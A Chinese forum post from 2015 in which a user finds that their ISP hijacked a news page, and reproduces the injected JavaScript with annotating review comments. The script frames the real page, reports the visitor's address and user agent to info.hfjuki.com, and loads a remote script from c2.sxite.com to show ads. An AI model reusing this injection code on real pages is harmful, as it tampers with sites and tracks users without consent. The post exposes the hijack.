本帖最后由 hudba 于 2015-2-3 00:56 编辑
上网易看新闻,半天打不开,发现状态栏显示正在访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现页面后面被加了一段 js,真正的新闻内容被放进了 iframe。
接下来就是去搜索这个域名,发现 v2ex 上也有人遇到这个问题,原来是运营商搞的鬼。
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8
http://www.v2ex.com/t/142197
顺便查下ip138:
这是那段 js 里面的代码,好像是个半成品,还没写入广告数据:
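/**
 * Returns the query string ("?..." onwards) of the injected loader's own
 * <script src>, as located by getMainJs().
 *
 * Listing restored from the forum post: the forum's interleaved filler
 * characters and list markers are removed; the statements are kept as posted.
 *
 * NOTE(review): when no matching script element is found the function asks
 * the browser to reload the page, but execution still continues to the
 * `s.src` access below, which throws a TypeError on null.
 *
 * @returns {string} substring of the script URL starting at the "?" that
 *     follows ".js".
 */
function locationSearch() {
    var s = getMainJs();
    if (s == null) {
        location.reload();
    }
    // indexOf(".js?") + 3 is the position of the "?" itself, so the result
    // keeps the leading "?" that getParameter() later splits on.
    return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
}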
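/**
 * Hand-rolled query-string lookup used to read the loader's configuration
 * out of its own script URL.
 *
 * Listing restored from the forum post: interleaved filler characters and
 * list markers are removed; the logic is kept exactly as posted.
 *
 * NOTE(review): the inner test searches for the bare `name` rather than
 * "&name=", so a name that also occurs earlier in the query string (for
 * example name "a" in "?data=1&a=2") yields an empty string instead of the
 * value. The value is returned without any decoding or validation.
 *
 * @param {string} name    parameter name to look up.
 * @param {string} paraStr string containing a "?"; only the part after the
 *     first "?" is searched.
 * @returns {string} the raw value, or the literal "No such parameter" when
 *     "&name=" does not occur.
 */
function getParameter(name, paraStr) {
    var result = "";
    // Prefix "&" so that every parameter, including the first, is "&key=".
    var str = "&" + paraStr.split("?")[1];
    var paraName = "&" + name + "=";
    if (str.indexOf(paraName) != -1) {
        if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
            // Another "&" follows: cut "&name=value" out up to the next "&".
            var TmpStr = str.substring(str.indexOf(paraName), str.length);
            result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
                    1, TmpStr.length).indexOf("&")
                    - TmpStr.indexOf(paraName) + 1);
        } else {
            // Last parameter: take everything to the end of the string.
            result = str.substring(str.indexOf(paraName), str.length);
        }
        result = result.substring(result.indexOf("=") + 1, result.length);
    } else {
        result = "No such parameter";
    }
    return (result.replace("&", ""));
}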
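/**
 * Finds the loader's own <script> element: the first script on the page
 * whose src contains the marker "t_c".
 *
 * Listing restored from the forum post: interleaved filler characters and
 * list markers are removed; the statements are kept as posted.
 *
 * For triage, a script element whose src contains "t_c" is therefore what
 * this sample expects to find in a modified page.
 *
 * @returns {?HTMLScriptElement} the matching element, or null if none.
 */
function getMainJs() {
    var scripts = document.getElementsByTagName("script");
    var s = null;
    for (var i = 0; i < scripts.length; i++) {
        // NOTE(review): this compares the element with the string
        // "undefined", not with the value undefined, so it does not act as
        // a real existence check.
        if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
            s = scripts[i];
            break;
        }
    }
    return s;
}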
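/**
 * Appends a "key=value" fragment to a URL, using "&" when the URL already
 * has a "?" after its first character and "?" otherwise.
 *
 * Listing restored from the forum post (filler characters removed, logic as
 * posted). Nothing in the visible listing calls this helper.
 *
 * @param {string} oStr URL to extend.
 * @param {string} aStr fragment to append, added verbatim with no encoding.
 * @returns {string} the extended URL.
 */
function appendParam(oStr, aStr) {
    // "> 0" (not ">= 0"): a "?" at index 0 is treated as "no query yet".
    if (oStr.indexOf('?') > 0) {
        oStr = oStr + "&" + aStr;
    } else {
        oStr = oStr + "?" + aStr;
    }
    return oStr;
}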
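// Replaces the page-wide error handler with an empty function, overwriting
// whatever handler had been assigned to window.onerror before this script ran.
// (Listing restored from the forum post; filler characters removed.)
window.onerror = function() {
};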
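// Number of polling attempts made so far by setTcTitle().
var g_titleTime = 0;

/**
 * Polls the framed document (iframe id "cn") once a second and, as soon as
 * it exposes a non-empty title, copies that title onto the outer wrapper
 * page and then calls setTcAdvVisible().
 *
 * Listing restored from the forum post: interleaved filler characters and
 * list markers are removed; the statements are kept as posted.
 *
 * NOTE(review): the retry limit reads as 5 in the post, but the digit sits
 * directly next to forum filler text, so treat the exact limit as
 * unconfirmed.
 */
function setTcTitle() {
    if (undefined == document) {
        g_titleTime++;
        // String argument: the browser evaluates it as code on each tick.
        setTimeout("setTcTitle();", 1000);
        return;
    }

    var doc;
    try {
        if (document.all) {
            // Legacy Internet Explorer path.
            doc = document.frames["cn"].document;
        } else {
            doc = document.getElementById("cn").contentDocument;
        }
    } catch (ex) {
        // Any failure to reach the framed document leaves doc undefined and
        // is handled by the retry branch below.
    }
    if (g_titleTime < 5
            && (undefined == doc || undefined == doc.title || "" == doc.title)) {
        g_titleTime++;
        setTimeout("setTcTitle();", 1000);
        return;
    } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
        // Mirroring the framed page's title makes the wrapper tab look like
        // the page that was requested.
        document.title = doc.title;
        setTcAdvVisible();
    }
}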
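// Schedules the first setTcTitle() poll one second after the script loads.
// The string form of setTimeout is evaluated as code by the browser.
// (Listing restored from the forum post; filler characters removed.)
setTimeout("setTcTitle();", 1000);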
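// Set once the "addiv" element has been revealed, so it is only done once.
var g_isHaveVisible = false;

/**
 * Reveals the element with id "addiv" (sets visibility and display) the
 * first time it is called while that element exists.
 *
 * Listing restored from the forum post: interleaved filler characters and
 * list markers are removed.
 *
 * NOTE(review): in the post the condition is split across two lines with
 * forum filler text at the break; it is reconstructed here as a single
 * three-part condition, which is the only reading that parses. The visible
 * listing never creates "addiv" itself; presumably it comes from the
 * remotely loaded script. Confirm against a full capture.
 */
function setTcAdvVisible() {
    if (undefined != document && undefined != document.getElementById("addiv")
            && !g_isHaveVisible) {
        document.getElementById("addiv").style.visibility = 'visible';
        document.getElementById("addiv").style.display = 'block';
        g_isHaveVisible = true;
    }
}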
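/**
 * Holder for the loader's configuration and the driver for the wrapper page.
 *
 * Listing restored from the forum post: interleaved filler characters and
 * list markers are removed; statements are kept as posted unless a comment
 * says otherwise.
 *
 * Observable behaviour, useful when triaging a modified page:
 *   - the requested page is displayed inside an iframe with id "cn";
 *   - a hidden iframe requests info.hfjuki.com:8060/page/statistics;
 *   - a script is loaded from c2.sxite.com:8060/center;
 *   - document.domain is shortened by one label when the framed title
 *     cannot be read.
 */
function UrlAnalyzer() {
    this.divda = "";
    this.tctype = "";
    this.radius = "";
    this.rlu = "";
}

/**
 * Fills the instance fields from the query string of the loader's own
 * script URL. Values are taken verbatim from getParameter(), so a missing
 * key stores the literal "No such parameter".
 */
UrlAnalyzer.prototype.initParameters = function() {
    var paraStr = locationSearch();
    this.rlu = getParameter("lruedct", paraStr);
    this.divda = getParameter("divda", paraStr);
    this.radius = getParameter("radius", paraStr);
    this.tctype = getParameter("tctype", paraStr);
    this.address = getParameter("address", paraStr);
    this.usagent = getParameter("usagent", paraStr);
}

/**
 * Returns the document inside the "cn" iframe, or undefined when it cannot
 * be reached (the exception from the access is swallowed).
 */
UrlAnalyzer.prototype.getHtmlDoc = function() {
    var doc;
    try {
        if (document.all) {
            // Legacy Internet Explorer path.
            doc = document.frames["cn"].document;

        } else {
            doc = document.getElementById("cn").contentDocument;
            // doc = document.getElementById("cn").contentWindow.document;
        }
    } catch (ex) {
    }
    return doc;
}

/**
 * While the wrapper's own title is still empty, drops the leftmost label
 * from document.domain and retries reading the framed title.
 *
 * NOTE(review): presumably the domain change is meant to make the framed
 * document readable from the wrapper; the listing itself only shows the
 * assignment followed by the retry.
 */
UrlAnalyzer.prototype.setDomain = function() {
    if (undefined != document.title && "" == document.title)
    {
        var index = document.domain.indexOf(".");
        if (undefined != index && -1 != index) {
            document.domain = document.domain.substring(index + 1,
                    document.domain.length);
        }

        var doc = this.getHtmlDoc();
        if (undefined != doc && undefined != doc.title && "" != doc.title) {
            document.title = doc.title;
            setTcAdvVisible();
        }
    }
}

/**
 * onload handler for the "cn" iframe: copies the framed title to the
 * wrapper when it is readable, otherwise schedules setDomain() after one
 * second.
 */
UrlAnalyzer.prototype.iframeCallback = function() {
    var doc = this.getHtmlDoc();
    if (undefined == doc || undefined == doc.title || "" == doc.title) {
        if (undefined != document.domain) {
            var self = this;
            setTimeout(function(){self.setDomain.call(self, null)}, 1000);
            // The posted sample carried a commented-out inline copy of the
            // setDomain() body at this point; it is omitted here.
        }
    } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
        document.title = doc.title;
        setTcAdvVisible();
    }
}

/**
 * Writes the hidden statistics iframe and the remote script tag into the
 * page with document.write, then hooks the "cn" iframe's load event.
 *
 * NOTE(review): the backslash escapes inside the HTML string literals were
 * lost in the forum rendering (the post shows `src=""`); they are restored
 * here so the literals parse. The "tctype" field of the statistics URL is
 * filled from this.divda in the post, not this.tctype. All values are
 * concatenated into markup without encoding.
 */
UrlAnalyzer.prototype.executeHtmlContext = function() {
    var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
            + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;

    var htmlStr = "<iframe src=\"" + staUrl
            + "\" style=\"display:none\"></iframe>";

    var advUrl = htmlStr
            + "<script src=\"http://c2.sxite.com:8060/center?advId="
            + this.divda + "&radius=" + this.radius + "&area=1" + "\"><\/script>";
    document.write(advUrl);

    var self = this;
    var iframe = document.getElementById("cn");
    if (iframe.attachEvent) {
        // Legacy Internet Explorer event API.
        iframe.attachEvent("onload", function() {
            self.iframeCallback.call(self, null);
        });
    } else {
        iframe.onload = function() {
            self.iframeCallback.call(self, null);
        }
    }
}

/**
 * Entry point: re-navigates the "cn" iframe to its own src, reads the
 * configuration and emits the extra markup.
 */
UrlAnalyzer.prototype.executeMain = function() {
    var mainFrame = document.getElementById("cn");
    mainFrame.contentWindow.location.href = mainFrame.src;
    this.initParameters();
    this.executeHtmlContext();
}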
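// Script entry point: runs as soon as the loader is parsed.
// (Listing restored from the forum post; filler characters removed.)
var g_analyzer = new UrlAnalyzer();
g_analyzer.executeMain();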